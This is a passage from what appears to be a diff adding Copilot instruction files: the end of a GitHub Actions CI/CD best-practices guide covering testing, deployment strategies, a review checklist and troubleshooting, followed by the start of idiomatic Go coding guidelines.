|
||||
- Advise on strategies to minimize E2E test flakiness, such as robust element selection and retry mechanisms.
|
||||
|
||||
### **4. Performance and Load Testing**
|
||||
|
||||
- **Principle:** Assess application performance and behavior under anticipated and peak load conditions to identify bottlenecks, ensure scalability, and prevent regressions.
|
||||
- **Deeper Dive:**
|
||||
- **Tools:** JMeter, k6, Locust, Gatling, Artillery. Choose based on language, complexity, and specific needs.
|
||||
- **Integration:** Integrate into CI/CD for continuous performance regression detection. Run these tests less frequently than unit/integration tests (e.g., nightly, weekly, or on significant feature merges).
|
||||
- **Thresholds:** Define clear performance thresholds (e.g., response time, throughput, error rates) and fail builds if these are exceeded.
|
||||
- **Baseline Comparison:** Compare current performance metrics against established baselines to detect degradation.
|
||||
- **Guidance for Copilot:**
|
||||
- Suggest integrating performance and load testing into the CI pipeline for critical applications, providing examples for common tools.
|
||||
- Advise on setting performance baselines and failing the build if performance degrades beyond a set threshold.
|
||||
- Recommend running these tests in a dedicated environment that simulates production load patterns.
|
||||
- Guide on analyzing performance test results to pinpoint areas for optimization (e.g., database queries, API endpoints).
|
||||
|
||||
### **5. Test Reporting and Visibility**
|
||||
|
||||
- **Principle:** Make test results easily accessible, understandable, and visible to all stakeholders (developers, QA, product owners) to foster transparency and enable quick issue resolution.
|
||||
- **Deeper Dive:**
|
||||
- **GitHub Checks/Annotations:** Leverage these for inline feedback directly in pull requests, showing which tests passed/failed and providing links to detailed reports.
|
||||
- **Artifacts:** Upload comprehensive test reports (JUnit XML, HTML reports, code coverage reports, video recordings, screenshots) as artifacts for long-term storage and detailed inspection.
|
||||
- **Integration with Dashboards:** Push results to external dashboards or reporting tools (e.g., SonarQube, custom reporting tools, Allure Report, TestRail) for aggregated views and historical trends.
|
||||
- **Status Badges:** Use GitHub Actions status badges in your README to indicate the latest build/test status at a glance.
|
||||
- **Guidance for Copilot:**
|
||||
- Use actions that publish test results as annotations or checks on PRs for immediate feedback and easy debugging directly in the GitHub UI.
|
||||
- Upload detailed test reports (e.g., XML, HTML, JSON) as artifacts for later inspection and historical analysis, including negative results like error screenshots.
|
||||
- Advise on integrating with external reporting tools for a more comprehensive view of test execution trends and quality metrics.
|
||||
- Suggest adding workflow status badges to the README for quick visibility of CI/CD health.
|
||||
|
||||
## Advanced Deployment Strategies (Expanded)
|
||||
|
||||
### **1. Staging Environment Deployment**
|
||||
|
||||
- **Principle:** Deploy to a staging environment that closely mirrors production for comprehensive validation, user acceptance testing (UAT), and final checks before promotion to production.
|
||||
- **Deeper Dive:**
|
||||
- **Mirror Production:** Staging should closely mimic production in terms of infrastructure, data, configuration, and security. Any significant discrepancies can lead to issues in production.
|
||||
- **Automated Promotion:** Implement automated promotion from staging to production upon successful UAT and necessary manual approvals. This reduces human error and speeds up releases.
|
||||
- **Environment Protection:** Use environment protection rules in GitHub Actions to prevent accidental deployments, enforce manual approvals, and restrict which branches can deploy to staging.
|
||||
- **Data Refresh:** Regularly refresh staging data from production (anonymized if necessary) to ensure realistic testing scenarios.
|
||||
- **Guidance for Copilot:**
|
||||
- Create a dedicated `environment` for staging with approval rules, secret protection, and appropriate branch protection policies.
|
||||
- Design workflows to automatically deploy to staging on successful merges to specific development or release branches (e.g., `develop`, `release/*`).
|
||||
- Advise on ensuring the staging environment is as close to production as possible to maximize test fidelity.
|
||||
- Suggest implementing automated smoke tests and post-deployment validation on staging.
|
||||
|
||||
### **2. Production Environment Deployment**
|
||||
|
||||
- **Principle:** Deploy to production only after thorough validation, potentially multiple layers of manual approvals, and robust automated checks, prioritizing stability and zero-downtime.
|
||||
- **Deeper Dive:**
|
||||
- **Manual Approvals:** Critical for production deployments, often involving multiple team members, security sign-offs, or change management processes. GitHub Environments support this natively.
|
||||
- **Rollback Capabilities:** Essential for rapid recovery from unforeseen issues. Ensure a quick and reliable way to revert to the previous stable state.
|
||||
- **Observability During Deployment:** Monitor production closely *during* and *immediately after* deployment for any anomalies or performance degradation. Use dashboards, alerts, and tracing.
|
||||
- **Progressive Delivery:** Consider advanced techniques like blue/green, canary, or dark launching for safer rollouts.
|
||||
- **Emergency Deployments:** Have a separate, highly expedited pipeline for critical hotfixes that bypasses non-essential approvals but still maintains security checks.
|
||||
- **Guidance for Copilot:**
|
||||
- Create a dedicated `environment` for production with required reviewers, strict branch protections, and clear deployment windows.
|
||||
- Implement manual approval steps for production deployments, potentially integrating with external ITSM or change management systems.
|
||||
- Emphasize the importance of clear, well-tested rollback strategies and automated rollback procedures in case of deployment failures.
|
||||
- Advise on setting up comprehensive monitoring and alerting for production systems to detect and respond to issues immediately post-deployment.
|
||||
|
||||
### **3. Deployment Types (Beyond Basic Rolling Update)**
|
||||
|
||||
- **Rolling Update (Default for Deployments):** Gradually replaces instances of the old version with new ones. Good for most cases, especially stateless applications.
|
||||
- **Guidance:** Configure `maxSurge` (how many new instances can be created above the desired replica count) and `maxUnavailable` (how many old instances can be unavailable) for fine-grained control over rollout speed and availability.
|
||||
- **Blue/Green Deployment:** Deploy a new version (green) alongside the existing stable version (blue) in a separate environment, then switch traffic completely from blue to green.
|
||||
- **Guidance:** Suggest for critical applications requiring zero-downtime releases and easy rollback. Requires managing two identical environments and a traffic router (load balancer, Ingress controller, DNS).
|
||||
- **Benefits:** Instantaneous rollback by switching traffic back to the blue environment.
|
||||
- **Canary Deployment:** Gradually roll out new versions to a small subset of users (e.g., 5-10%) before a full rollout. Monitor performance and error rates for the canary group.
|
||||
- **Guidance:** Recommend for testing new features or changes with a controlled blast radius. Implement with Service Mesh (Istio, Linkerd) or Ingress controllers that support traffic splitting and metric-based analysis.
|
||||
- **Benefits:** Early detection of issues with minimal user impact.
|
||||
- **Dark Launch/Feature Flags:** Deploy new code but keep features hidden from users until toggled on for specific users/groups via feature flags.
|
||||
- **Guidance:** Advise for decoupling deployment from release, allowing continuous delivery without continuous exposure of new features. Use feature flag management systems (LaunchDarkly, Split.io, Unleash).
|
||||
- **Benefits:** Reduces deployment risk, enables A/B testing, and allows for staged rollouts.
|
||||
- **A/B Testing Deployments:** Deploy multiple versions of a feature concurrently to different user segments to compare their performance based on user behavior and business metrics.
|
||||
- **Guidance:** Suggest integrating with specialized A/B testing platforms or building custom logic using feature flags and analytics.
|
||||
|
||||
### **4. Rollback Strategies and Incident Response**
|
||||
|
||||
- **Principle:** Be able to quickly and safely revert to a previous stable version in case of issues, minimizing downtime and business impact. This requires proactive planning.
|
||||
- **Deeper Dive:**
|
||||
- **Automated Rollbacks:** Implement mechanisms to automatically trigger rollbacks based on monitoring alerts (e.g., sudden increase in errors, high latency) or failure of post-deployment health checks.
|
||||
- **Versioned Artifacts:** Ensure previous successful build artifacts, Docker images, or infrastructure states are readily available and easily deployable. This is crucial for fast recovery.
|
||||
- **Runbooks:** Document clear, concise, and executable rollback procedures for manual intervention when automation isn't sufficient or for complex scenarios. These should be regularly reviewed and tested.
|
||||
- **Post-Incident Review:** Conduct blameless post-incident reviews (PIRs) to understand the root cause of failures, identify lessons learned, and implement preventative measures to improve resilience and reduce MTTR.
|
||||
- **Communication Plan:** Have a clear communication plan for stakeholders during incidents and rollbacks.
|
||||
- **Guidance for Copilot:**
|
||||
- Instruct users to store previous successful build artifacts and images for quick recovery, ensuring they are versioned and easily retrievable.
|
||||
- Advise on implementing automated rollback steps in the pipeline, triggered by monitoring or health check failures, and providing examples.
|
||||
- Emphasize building applications with "undo" in mind, meaning changes should be easily reversible.
|
||||
- Suggest creating comprehensive runbooks for common incident scenarios, including step-by-step rollback instructions, and highlight their importance for MTTR.
|
||||
- Guide on setting up alerts that are specific and actionable enough to trigger an automatic or manual rollback.
|
||||
|
||||
## GitHub Actions Workflow Review Checklist (Comprehensive)
|
||||
|
||||
This checklist provides a granular set of criteria for reviewing GitHub Actions workflows to ensure they adhere to best practices for security, performance, and reliability.
|
||||
|
||||
- [ ] **General Structure and Design:**
|
||||
- Is the workflow `name` clear, descriptive, and unique?
|
||||
- Are `on` triggers appropriate for the workflow's purpose (e.g., `push`, `pull_request`, `workflow_dispatch`, `schedule`)? Are path/branch filters used effectively?
|
||||
- Is `concurrency` used for critical workflows or shared resources to prevent race conditions or resource exhaustion?
|
||||
- Are global `permissions` set to the principle of least privilege (`contents: read` by default), with specific overrides for jobs?
|
||||
- Are reusable workflows (`workflow_call`) leveraged for common patterns to reduce duplication and improve maintainability?
|
||||
- Is the workflow organized logically with meaningful job and step names?
|
||||
|
||||
- [ ] **Jobs and Steps Best Practices:**
|
||||
- Are jobs clearly named and represent distinct phases (e.g., `build`, `lint`, `test`, `deploy`)?
|
||||
- Are `needs` dependencies correctly defined between jobs to ensure proper execution order?
|
||||
- Are `outputs` used efficiently for inter-job and inter-workflow communication?
|
||||
- Are `if` conditions used effectively for conditional job/step execution (e.g., environment-specific deployments, branch-specific actions)?
|
||||
- Are all `uses` actions securely versioned (pinned to a full commit SHA or specific major version tag like `@v4`)? Avoid `main` or `latest` tags.
|
||||
- Are `run` commands efficient and clean (combined with `&&`, temporary files removed, multi-line scripts clearly formatted)?
|
||||
- Are environment variables (`env`) defined at the appropriate scope (workflow, job, step) and never hardcoded sensitive data?
|
||||
- Is `timeout-minutes` set for long-running jobs to prevent hung workflows?
|
||||
|
||||
- [ ] **Security Considerations:**
|
||||
- Are all sensitive data accessed exclusively via GitHub `secrets` context (`${{ secrets.MY_SECRET }}`)? Never hardcoded, never exposed in logs (even if masked).
|
||||
- Is OpenID Connect (OIDC) used for cloud authentication where possible, eliminating long-lived credentials?
|
||||
- Is `GITHUB_TOKEN` permission scope explicitly defined and limited to the minimum necessary access (`contents: read` as a baseline)?
|
||||
- Are Software Composition Analysis (SCA) tools (e.g., `dependency-review-action`, Snyk) integrated to scan for vulnerable dependencies?
|
||||
- Are Static Application Security Testing (SAST) tools (e.g., CodeQL, SonarQube) integrated to scan source code for vulnerabilities, with critical findings blocking builds?
|
||||
- Is secret scanning enabled for the repository and are pre-commit hooks suggested for local credential leak prevention?
|
||||
- Is there a strategy for container image signing (e.g., Notary, Cosign) and verification in deployment workflows if container images are used?
|
||||
- For self-hosted runners, are security hardening guidelines followed and network access restricted?
|
||||
|
||||
- [ ] **Optimization and Performance:**
|
||||
- Is caching (`actions/cache`) effectively used for package manager dependencies (`node_modules`, `pip` caches, Maven/Gradle caches) and build outputs?
|
||||
- Are cache `key` and `restore-keys` designed for optimal cache hit rates (e.g., using `hashFiles`)?
|
||||
- Is `strategy.matrix` used for parallelizing tests or builds across different environments, language versions, or OSs?
|
||||
- Is `fetch-depth: 1` used for `actions/checkout` where full Git history is not required?
|
||||
- Are artifacts (`actions/upload-artifact`, `actions/download-artifact`) used efficiently for transferring data between jobs/workflows rather than re-building or re-fetching?
|
||||
- Are large files managed with Git LFS and optimized for checkout if necessary?
|
||||
|
||||
- [ ] **Testing Strategy Integration:**
|
||||
- Are comprehensive unit tests configured with a dedicated job early in the pipeline?
|
||||
- Are integration tests defined, ideally leveraging `services` for dependencies, and run after unit tests?
|
||||
- Are End-to-End (E2E) tests included, preferably against a staging environment, with robust flakiness mitigation?
|
||||
- Are performance and load tests integrated for critical applications with defined thresholds?
|
||||
- Are all test reports (JUnit XML, HTML, coverage) collected, published as artifacts, and integrated into GitHub Checks/Annotations for clear visibility?
|
||||
- Is code coverage tracked and enforced with a minimum threshold?
|
||||
|
||||
- [ ] **Deployment Strategy and Reliability:**
|
||||
- Are staging and production deployments using GitHub `environment` rules with appropriate protections (manual approvals, required reviewers, branch restrictions)?
|
||||
- Are manual approval steps configured for sensitive production deployments?
|
||||
- Is a clear and well-tested rollback strategy in place and automated where possible (e.g., `kubectl rollout undo`, reverting to previous stable image)?
|
||||
- Are chosen deployment types (e.g., rolling, blue/green, canary, dark launch) appropriate for the application's criticality and risk tolerance?
|
||||
- Are post-deployment health checks and automated smoke tests implemented to validate successful deployment?
|
||||
- Is the workflow resilient to temporary failures (e.g., retries for flaky network operations)?
|
||||
|
||||
- [ ] **Observability and Monitoring:**
|
||||
- Is logging adequate for debugging workflow failures (using STDOUT/STDERR for application logs)?
|
||||
- Are relevant application and infrastructure metrics collected and exposed (e.g., Prometheus metrics)?
|
||||
- Are alerts configured for critical workflow failures, deployment issues, or application anomalies detected in production?
|
||||
- Is distributed tracing (e.g., OpenTelemetry, Jaeger) integrated for understanding request flows in microservices architectures?
|
||||
- Are artifact `retention-days` configured appropriately to manage storage and compliance?
|
||||
|
||||
## Troubleshooting Common GitHub Actions Issues (Deep Dive)
|
||||
|
||||
This section provides an expanded guide to diagnosing and resolving frequent problems encountered when working with GitHub Actions workflows.
|
||||
|
||||
### **1. Workflow Not Triggering or Jobs/Steps Skipping Unexpectedly**
|
||||
|
||||
- **Root Causes:** Mismatched `on` triggers, incorrect `paths` or `branches` filters, erroneous `if` conditions, or `concurrency` limitations.
|
||||
- **Actionable Steps:**
|
||||
- **Verify Triggers:**
|
||||
- Check the `on` block for an exact match with the event that should trigger the workflow (e.g., `push`, `pull_request`, `workflow_dispatch`, `schedule`).
|
||||
- Ensure `branches`, `tags`, or `paths` filters are correctly defined and match the event context. Remember that `paths-ignore` and `branches-ignore` take precedence.
|
||||
- If using `workflow_dispatch`, verify the workflow file is in the default branch and any required `inputs` are provided correctly during manual trigger.
|
||||
- **Inspect `if` Conditions:**
|
||||
- Carefully review all `if` conditions at the workflow, job, and step levels. A single false condition can prevent execution.
|
||||
- Use `always()` on a debug step to print context variables (`${{ toJson(github) }}`, `${{ toJson(job) }}`, `${{ toJson(steps) }}`) to understand the exact state during evaluation.
|
||||
- Test complex `if` conditions in a simplified workflow.
|
||||
- **Check `concurrency`:**
|
||||
- If `concurrency` is defined, verify if a previous run is blocking a new one for the same group. Check the "Concurrency" tab in the workflow run.
|
||||
- **Branch Protection Rules:** Ensure no branch protection rules are preventing workflows from running on certain branches or requiring specific checks that haven't passed.
|
||||
|
||||
### **2. Permissions Errors (`Resource not accessible by integration`, `Permission denied`)**
|
||||
|
||||
- **Root Causes:** `GITHUB_TOKEN` lacking necessary permissions, incorrect environment secrets access, or insufficient permissions for external actions.
|
||||
- **Actionable Steps:**
|
||||
- **`GITHUB_TOKEN` Permissions:**
|
||||
- Review the `permissions` block at both the workflow and job levels. Default to `contents: read` globally and grant specific write permissions only where absolutely necessary (e.g., `pull-requests: write` for updating PR status, `packages: write` for publishing packages).
|
||||
- Understand the default permissions of `GITHUB_TOKEN` which are often too broad.
|
||||
- **Secret Access:**
|
||||
- Verify if secrets are correctly configured in the repository, organization, or environment settings.
|
||||
- Ensure the workflow/job has access to the specific environment if environment secrets are used. Check if any manual approvals are pending for the environment.
|
||||
- Confirm the secret name matches exactly (`secrets.MY_API_KEY`).
|
||||
- **OIDC Configuration:**
|
||||
- For OIDC-based cloud authentication, double-check the trust policy configuration in your cloud provider (AWS IAM roles, Azure AD app registrations, GCP service accounts) to ensure it correctly trusts GitHub's OIDC issuer.
|
||||
- Verify the role/identity assigned has the necessary permissions for the cloud resources being accessed.
|
||||
|
||||
### **3. Caching Issues (`Cache not found`, `Cache miss`, `Cache creation failed`)**
|
||||
|
||||
- **Root Causes:** Incorrect cache key logic, `path` mismatch, cache size limits, or frequent cache invalidation.
|
||||
- **Actionable Steps:**
|
||||
- **Validate Cache Keys:**
|
||||
- Verify `key` and `restore-keys` are correct and dynamically change only when dependencies truly change (e.g., `key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}`). A cache key that is too dynamic will always result in a miss.
|
||||
- Use `restore-keys` to provide fallbacks for slight variations, increasing cache hit chances.
|
||||
- **Check `path`:**
|
||||
- Ensure the `path` specified in `actions/cache` for saving and restoring corresponds exactly to the directory where dependencies are installed or artifacts are generated.
|
||||
- Verify the existence of the `path` before caching.
|
||||
- **Debug Cache Behavior:**
|
||||
- Use the `actions/cache/restore` action with `lookup-only: true` to inspect what keys are being tried and why a cache miss occurred without affecting the build.
|
||||
- Review workflow logs for `Cache hit` or `Cache miss` messages and associated keys.
|
||||
- **Cache Size and Limits:** Be aware of GitHub Actions cache size limits per repository. If caches are very large, they might be evicted frequently.
|
||||
|
||||
### **4. Long Running Workflows or Timeouts**
|
||||
|
||||
- **Root Causes:** Inefficient steps, lack of parallelism, large dependencies, unoptimized Docker image builds, or resource bottlenecks on runners.
|
||||
- **Actionable Steps:**
|
||||
- **Profile Execution Times:**
|
||||
- Use the workflow run summary to identify the longest-running jobs and steps. This is your primary tool for optimization.
|
||||
- **Optimize Steps:**
|
||||
- Combine `run` commands with `&&` to reduce layer creation and overhead in Docker builds.
|
||||
- Clean up temporary files immediately after use (`rm -rf` in the same `RUN` command).
|
||||
- Install only necessary dependencies.
|
||||
- **Leverage Caching:**
|
||||
- Ensure `actions/cache` is optimally configured for all significant dependencies and build outputs.
|
||||
- **Parallelize with Matrix Strategies:**
|
||||
- Break down tests or builds into smaller, parallelizable units using `strategy.matrix` to run them concurrently.
|
||||
- **Choose Appropriate Runners:**
|
||||
- Review `runs-on`. For very resource-intensive tasks, consider using larger GitHub-hosted runners (if available) or self-hosted runners with more powerful specs.
|
||||
- **Break Down Workflows:**
|
||||
- For very complex or long workflows, consider breaking them into smaller, independent workflows that trigger each other or use reusable workflows.
|
||||
|
||||
### **5. Flaky Tests in CI (`Random failures`, `Passes locally, fails in CI`)**
|
||||
|
||||
- **Root Causes:** Non-deterministic tests, race conditions, environmental inconsistencies between local and CI, reliance on external services, or poor test isolation.
|
||||
- **Actionable Steps:**
|
||||
- **Ensure Test Isolation:**
|
||||
- Make sure each test is independent and doesn't rely on the state left by previous tests. Clean up resources (e.g., database entries) after each test or test suite.
|
||||
- **Eliminate Race Conditions:**
|
||||
- For integration/E2E tests, use explicit waits (e.g., wait for element to be visible, wait for API response) instead of arbitrary `sleep` commands.
|
||||
- Implement retries for operations that interact with external services or have transient failures.
|
||||
- **Standardize Environments:**
|
||||
- Ensure the CI environment (Node.js version, Python packages, database versions) matches the local development environment as closely as possible.
|
||||
- Use Docker `services` for consistent test dependencies.
|
||||
- **Robust Selectors (E2E):**
|
||||
- Use stable, unique selectors in E2E tests (e.g., `data-testid` attributes) instead of brittle CSS classes or XPath.
|
||||
- **Debugging Tools:**
|
||||
- Configure E2E test frameworks to capture screenshots and video recordings on test failure in CI to visually diagnose issues.
|
||||
- **Run Flaky Tests in Isolation:**
|
||||
- If a test is consistently flaky, isolate it and run it repeatedly to identify the underlying non-deterministic behavior.
|
||||
|
||||
### **6. Deployment Failures (Application Not Working After Deploy)**
|
||||
|
||||
- **Root Causes:** Configuration drift, environmental differences, missing runtime dependencies, application errors, or network issues post-deployment.
|
||||
- **Actionable Steps:**
|
||||
- **Thorough Log Review:**
|
||||
- Review deployment logs (`kubectl logs`, application logs, server logs) for any error messages, warnings, or unexpected output during the deployment process and immediately after.
|
||||
- **Configuration Validation:**
|
||||
- Verify environment variables, ConfigMaps, Secrets, and other configuration injected into the deployed application. Ensure they match the target environment's requirements and are not missing or malformed.
|
||||
- Use pre-deployment checks to validate configuration.
|
||||
- **Dependency Check:**
|
||||
- Confirm all application runtime dependencies (libraries, frameworks, external services) are correctly bundled within the container image or installed in the target environment.
|
||||
- **Post-Deployment Health Checks:**
|
||||
- Implement robust automated smoke tests and health checks *after* deployment to immediately validate core functionality and connectivity. Trigger rollbacks if these fail.
|
||||
- **Network Connectivity:**
|
||||
- Check network connectivity between deployed components (e.g., application to database, service to service) within the new environment. Review firewall rules, security groups, and Kubernetes network policies.
|
||||
- **Rollback Immediately:**
|
||||
- If a production deployment fails or causes degradation, trigger the rollback strategy immediately to restore service. Diagnose the issue in a non-production environment.
|
||||
|
||||
## Conclusion
|
||||
|
||||
GitHub Actions is a powerful and flexible platform for automating your software development lifecycle. By rigorously applying these best practices—from securing your secrets and token permissions, to optimizing performance with caching and parallelization, and implementing comprehensive testing and robust deployment strategies—you can guide developers in building highly efficient, secure, and reliable CI/CD pipelines. Remember that CI/CD is an iterative journey; continuously measure, optimize, and secure your pipelines to achieve faster, safer, and more confident releases. Your detailed guidance will empower teams to leverage GitHub Actions to its fullest potential and deliver high-quality software with confidence. This extensive document serves as a foundational resource for anyone looking to master CI/CD with GitHub Actions.
|
||||
|
||||
---
|
||||
|
||||
<!-- End of GitHub Actions CI/CD Best Practices Instructions -->
|
||||
@@ -0,0 +1,350 @@
|
||||
---
|
||||
description: 'Instructions for writing Go code following idiomatic Go practices and community standards'
|
||||
applyTo: '**/*.go,**/go.mod,**/go.sum'
|
||||
---
|
||||
|
||||
# Go Development Instructions
|
||||
|
||||
Follow idiomatic Go practices and community standards when writing Go code.
|
||||
These instructions are based on:
|
||||
|
||||
- [Effective Go](https://go.dev/doc/effective_go)
|
||||
- [Go Code Review Comments](https://go.dev/wiki/CodeReviewComments)
|
||||
- [Uber's Go Style Guide](https://github.com/uber-go/guide)
|
||||
- [Google's Go Style Guide](https://google.github.io/styleguide/go/)
|
||||
|
||||
## General Instructions
|
||||
|
||||
- Write simple, clear, and idiomatic Go code
|
||||
- Favor clarity and simplicity over cleverness
|
||||
- Follow the principle of least surprise
|
||||
- Keep the happy path left-aligned (minimize indentation)
|
||||
- Return early to reduce nesting
|
||||
- Prefer early return over if-else chains; use `if condition { return }` pattern to avoid else blocks
|
||||
- Make the zero value useful
|
||||
- Write self-documenting code with clear, descriptive names
|
||||
- Document exported types, functions, methods, and packages
|
||||
- Use Go modules for dependency management
|
||||
- Leverage the Go standard library instead of reinventing the wheel (e.g., use `strings.Builder` for string concatenation, `filepath.Join` for path construction)
|
||||
- Prefer standard library solutions over custom implementations when functionality exists
|
||||
- Write comments in English by default; translate only upon user request
|
||||
- Avoid using emoji in code and comments
|
||||
|
||||
## Naming Conventions
|
||||
|
||||
### Packages
|
||||
|
||||
- Use lowercase, single-word package names
|
||||
- Avoid underscores, hyphens, or mixedCaps
|
||||
- Choose names that describe what the package provides, not what it contains
|
||||
- Avoid generic names like `util`, `common`, or `base`
|
||||
- Package names should be singular, not plural
|
||||
|
||||
#### Package Declaration Rules (CRITICAL):
|
||||
|
||||
- **NEVER duplicate `package` declarations** - each Go file must have exactly ONE `package` line
|
||||
- When editing an existing `.go` file:
|
||||
- **PRESERVE** the existing `package` declaration - do not add another one
|
||||
- If you need to replace the entire file content, start with the existing package name
|
||||
- When creating a new `.go` file:
|
||||
- **BEFORE writing any code**, check what package name other `.go` files in the same directory use
|
||||
- Use the SAME package name as existing files in that directory
|
||||
- If it's a new directory, use the directory name as the package name
|
||||
- Write **exactly one** `package <name>` line at the very top of the file
|
||||
- When using file creation or replacement tools:
|
||||
- **ALWAYS verify** the target file doesn't already have a `package` declaration before adding one
|
||||
- If replacing file content, include only ONE `package` declaration in the new content
|
||||
- **NEVER** create files with multiple `package` lines or duplicate declarations
|
||||
|
||||
### Variables and Functions
|
||||
|
||||
- Use mixedCaps or MixedCaps (camelCase) rather than underscores
|
||||
- Keep names short but descriptive
|
||||
- Use single-letter variables only for very short scopes (like loop indices)
|
||||
- Exported names start with a capital letter
|
||||
- Unexported names start with a lowercase letter
|
||||
- Avoid stuttering (e.g., avoid `http.HTTPServer`, prefer `http.Server`)
|
||||
|
||||
### Interfaces
|
||||
|
||||
- Name interfaces with -er suffix when possible (e.g., `Reader`, `Writer`, `Formatter`)
|
||||
- Single-method interfaces should be named after the method (e.g., `Read` → `Reader`)
|
||||
- Keep interfaces small and focused
|
||||
|
||||
### Constants
|
||||
|
||||
- Use MixedCaps for exported constants
|
||||
- Use mixedCaps for unexported constants
|
||||
- Group related constants using `const` blocks
|
||||
- Consider using typed constants for better type safety
|
||||
|
||||
## Code Style and Formatting
|
||||
|
||||
### Formatting
|
||||
|
||||
- Always use `gofmt` to format code
|
||||
- Use `goimports` to manage imports automatically
|
||||
- Keep line length reasonable (no hard limit, but consider readability)
|
||||
- Add blank lines to separate logical groups of code
|
||||
|
||||
### Comments
|
||||
|
||||
- Strive for self-documenting code; prefer clear variable names, function names, and code structure over comments
|
||||
- Write comments only when necessary to explain complex logic, business rules, or non-obvious behavior
|
||||
- Write comments in complete sentences in English by default
|
||||
- Translate comments to other languages only upon specific user request
|
||||
- Start sentences with the name of the thing being described
|
||||
- Package comments should start with "Package [name]"
|
||||
- Use line comments (`//`) for most comments
|
||||
- Use block comments (`/* */`) sparingly, mainly for package documentation
|
||||
- Document why, not what, unless the what is complex
|
||||
- Avoid emoji in comments and code
|
||||
|
||||
### Error Handling
|
||||
|
||||
- Check errors immediately after the function call
|
||||
- Don't ignore errors using `_` unless you have a good reason (document why)
|
||||
- Wrap errors with context using `fmt.Errorf` with `%w` verb
|
||||
- Create custom error types when you need to check for specific errors
|
||||
- Place error returns as the last return value
|
||||
- Name error variables `err`
|
||||
- Keep error messages lowercase and don't end with punctuation
|
||||
|
||||
## Architecture and Project Structure
|
||||
|
||||
### Package Organization
|
||||
|
||||
- Follow standard Go project layout conventions
|
||||
- Keep `main` packages in `cmd/` directory
|
||||
- Put reusable packages in `pkg/` or `internal/`
|
||||
- Use `internal/` for packages that shouldn't be imported by external projects
|
||||
- Group related functionality into packages
|
||||
- Avoid circular dependencies
|
||||
|
||||
### Dependency Management
|
||||
|
||||
- Use Go modules (`go.mod` and `go.sum`)
|
||||
- Keep dependencies minimal
|
||||
- Regularly update dependencies for security patches
|
||||
- Use `go mod tidy` to clean up unused dependencies
|
||||
- Vendor dependencies only when necessary
|
||||
|
||||
## Type Safety and Language Features
|
||||
|
||||
### Type Definitions
|
||||
|
||||
- Define types to add meaning and type safety
|
||||
- Use struct tags for JSON, XML, database mappings
|
||||
- Prefer explicit type conversions
|
||||
- Use type assertions carefully and check the second return value
|
||||
- Prefer generics over unconstrained types; when an unconstrained type is truly needed, use the predeclared alias `any` instead of `interface{}`
|
||||
|
||||
### Pointers vs Values
|
||||
|
||||
- Use pointer receivers for large structs or when you need to modify the receiver
|
||||
- Use value receivers for small structs and when immutability is desired
|
||||
- Use pointer parameters when you need to modify the argument or for large structs
|
||||
- Use value parameters for small structs and when you want to prevent modification
|
||||
- Be consistent within a type's method set
|
||||
- Consider the zero value when choosing pointer vs value receivers
|
||||
|
||||
### Interfaces and Composition
|
||||
|
||||
- Accept interfaces, return concrete types
|
||||
- Keep interfaces small (1-3 methods is ideal)
|
||||
- Use embedding for composition
|
||||
- Define interfaces close to where they're used, not where they're implemented
|
||||
- Don't export interfaces unless necessary
|
||||
|
||||
## Concurrency
|
||||
|
||||
### Goroutines
|
||||
|
||||
- Be cautious about creating goroutines in libraries; prefer letting the caller control concurrency
|
||||
- If you must create goroutines in libraries, provide clear documentation and cleanup mechanisms
|
||||
- Always know how a goroutine will exit
|
||||
- Use `sync.WaitGroup` or channels to wait for goroutines
|
||||
- Avoid goroutine leaks by ensuring cleanup
|
||||
|
||||
### Channels
|
||||
|
||||
- Use channels to communicate between goroutines
|
||||
- Don't communicate by sharing memory; share memory by communicating
|
||||
- Close channels from the sender side, not the receiver
|
||||
- Use buffered channels when you know the capacity
|
||||
- Use `select` for non-blocking operations
|
||||
|
||||
### Synchronization
|
||||
|
||||
- Use `sync.Mutex` for protecting shared state
|
||||
- Keep critical sections small
|
||||
- Use `sync.RWMutex` when you have many readers
|
||||
- Choose between channels and mutexes based on the use case: use channels for communication, mutexes for protecting state
|
||||
- Use `sync.Once` for one-time initialization
|
||||
- WaitGroup usage by Go version:
|
||||
- If `go >= 1.25` in `go.mod`, use the new `WaitGroup.Go` method ([documentation](https://pkg.go.dev/sync#WaitGroup)):
|
||||
```go
|
||||
var wg sync.WaitGroup
|
||||
wg.Go(task1)
|
||||
wg.Go(task2)
|
||||
wg.Wait()
|
||||
```
|
||||
- If `go < 1.25`, use the classic `Add`/`Done` pattern
|
||||
|
||||
## Error Handling Patterns
|
||||
|
||||
### Creating Errors
|
||||
|
||||
- Use `errors.New` for simple static errors
|
||||
- Use `fmt.Errorf` for dynamic errors
|
||||
- Create custom error types for domain-specific errors
|
||||
- Export error variables for sentinel errors
|
||||
- Use `errors.Is` and `errors.As` for error checking
|
||||
|
||||
### Error Propagation
|
||||
|
||||
- Add context when propagating errors up the stack
|
||||
- Don't log and return errors (choose one)
|
||||
- Handle errors at the appropriate level
|
||||
- Consider using structured errors for better debugging
|
||||
|
||||
## Performance Optimization
|
||||
|
||||
### Memory Management
|
||||
|
||||
- Minimize allocations in hot paths
|
||||
- Reuse objects when possible (consider `sync.Pool`)
|
||||
- Use value receivers for small structs
|
||||
- Preallocate slices when size is known
|
||||
- Avoid unnecessary string conversions
|
||||
|
||||
### I/O: Readers and Buffers
|
||||
|
||||
- Most `io.Reader` streams are consumable once; reading advances state. Do not assume a reader can be re-read without special handling
|
||||
- If you must read data multiple times, buffer it once and recreate readers on demand:
|
||||
- Use `io.ReadAll` (or a limited read) to obtain `[]byte`, then create fresh readers via `bytes.NewReader(buf)` or `bytes.NewBuffer(buf)` for each reuse
|
||||
- For strings, use `strings.NewReader(s)`; you can `Seek(0, io.SeekStart)` on `*bytes.Reader` to rewind
|
||||
- For HTTP requests, do not reuse a consumed `req.Body`. Instead:
|
||||
- Keep the original payload as `[]byte` and set `req.Body = io.NopCloser(bytes.NewReader(buf))` before each send
|
||||
- Prefer configuring `req.GetBody` so the transport can recreate the body for redirects/retries: `req.GetBody = func() (io.ReadCloser, error) { return io.NopCloser(bytes.NewReader(buf)), nil }`
|
||||
- To duplicate a stream while reading, use `io.TeeReader` (copy to a buffer while passing through) or write to multiple sinks with `io.MultiWriter`
|
||||
- Reusing buffered readers: call `(*bufio.Reader).Reset(r)` to attach to a new underlying reader; do not expect it to “rewind” unless the source supports seeking
|
||||
- For large payloads, avoid unbounded buffering; consider streaming, `io.LimitReader`, or on-disk temporary storage to control memory
|
||||
|
||||
- Use `io.Pipe` to stream without buffering the whole payload:
|
||||
- Write to `*io.PipeWriter` in a separate goroutine while the reader consumes
|
||||
